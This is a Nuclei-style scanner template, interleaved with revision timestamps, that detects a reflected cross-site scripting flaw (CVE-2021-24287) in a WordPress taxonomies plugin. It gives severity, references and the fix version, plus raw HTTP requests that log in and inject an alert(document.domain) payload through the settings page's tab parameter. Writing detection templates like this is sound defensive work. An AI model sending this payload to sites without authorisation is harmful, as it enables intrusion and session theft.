2023-03-05 13:42:10 +00:00
id : CVE-2021-24287
info :
2023-03-13 17:11:25 +00:00
name : WordPress Select All Categories and Taxonomies <1.3.2 - Cross-Site Scripting
2023-03-05 13:42:10 +00:00
author : r3Y3r53
severity : medium
description : |
2023-03-13 17:11:25 +00:00
WordPress Select All Categories and Taxonomies plugin before 1.3.2 contains a cross-site scripting vulnerability. The settings page of the plugin does not properly sanitize the tab parameter before outputting it back. An attacker can inject arbitrary script in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks.
2023-09-27 15:51:13 +00:00
impact : |
Successful exploitation of this vulnerability could allow an attacker to inject malicious scripts into web pages viewed by users, leading to potential data theft, session hijacking, or defacement of the affected website.
2023-09-06 12:09:01 +00:00
remediation : Fixed in version 1.3.2.
2023-03-05 13:42:10 +00:00
reference :
- https://www.exploit-db.com/exploits/50349
- https://wpscan.com/vulnerability/56e1bb56-bfc5-40dd-b2d0-edef43d89bdf
- https://wordpress.org/plugins/select-all-categories-and-taxonomies-change-checkbox-to-radio-buttons/
2023-03-13 17:11:25 +00:00
- https://nvd.nist.gov/vuln/detail/CVE-2021-24287
2023-03-05 14:19:20 +00:00
classification :
cvss-metrics : CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
cvss-score : 6.1
cve-id : CVE-2021-24287
cwe-id : CWE-79
2023-04-12 10:55:48 +00:00
epss-score : 0.00177
2024-01-14 13:49:27 +00:00
epss-percentile : 0.54879
2023-09-06 12:09:01 +00:00
cpe : cpe:2.3:a:mooveagency:select_all_categories_and_taxonomies\,_change_checkbox_to_radio_buttons:*:*:*:*:*:wordpress:*:*
2023-03-05 13:42:10 +00:00
metadata :
2023-06-04 08:13:42 +00:00
verified : true
2023-09-06 12:09:01 +00:00
max-request : 2
2023-07-11 19:49:27 +00:00
vendor : mooveagency
product : select_all_categories_and_taxonomies\,_change_checkbox_to_radio_buttons
2023-09-06 12:09:01 +00:00
framework : wordpress
2024-01-14 09:21:50 +00:00
tags : cve2021,cve,wp,select-all-categories,taxonomies-change-checkbox-to-radio-buttons,authenticated,wpscan,xss,wp-plugin,wordpress,edb,mooveagency
2023-03-05 13:42:10 +00:00
2023-04-27 04:28:59 +00:00
http :
2023-03-05 13:42:10 +00:00
- raw :
- |
POST /wp-login.php HTTP/1.1
Host : {{Hostname}}
Content-Type : application/x-www-form-urlencoded
log={{username}}&pwd={{password}}&wp-submit=Log+In
- |
GET /wp-admin/options-general.php?page=moove-taxonomy-settings&tab="+style=animation-name:rotation+onanimationstart="alert(document.domain); HTTP/1.1
Host : {{Hostname}}
matchers :
- type : dsl
dsl :
- 'status_code_2 == 200'
- 'contains(body_2, "alert(document.domain)")'
- 'contains(body_2, "Set up the taxonomies")'
condition : and
2024-01-26 08:31:11 +00:00
# digest: 4b0a00483046022100b301210aead1d7b7f66519b00d69b6b4773d3147c1cb929f620856a7a233c36c0221009837940620aeb746d89d9d1151cd559a7f77cfc6b723909f75469da7ba7bbb4a:922c64590222798bb761d5b6d8e72950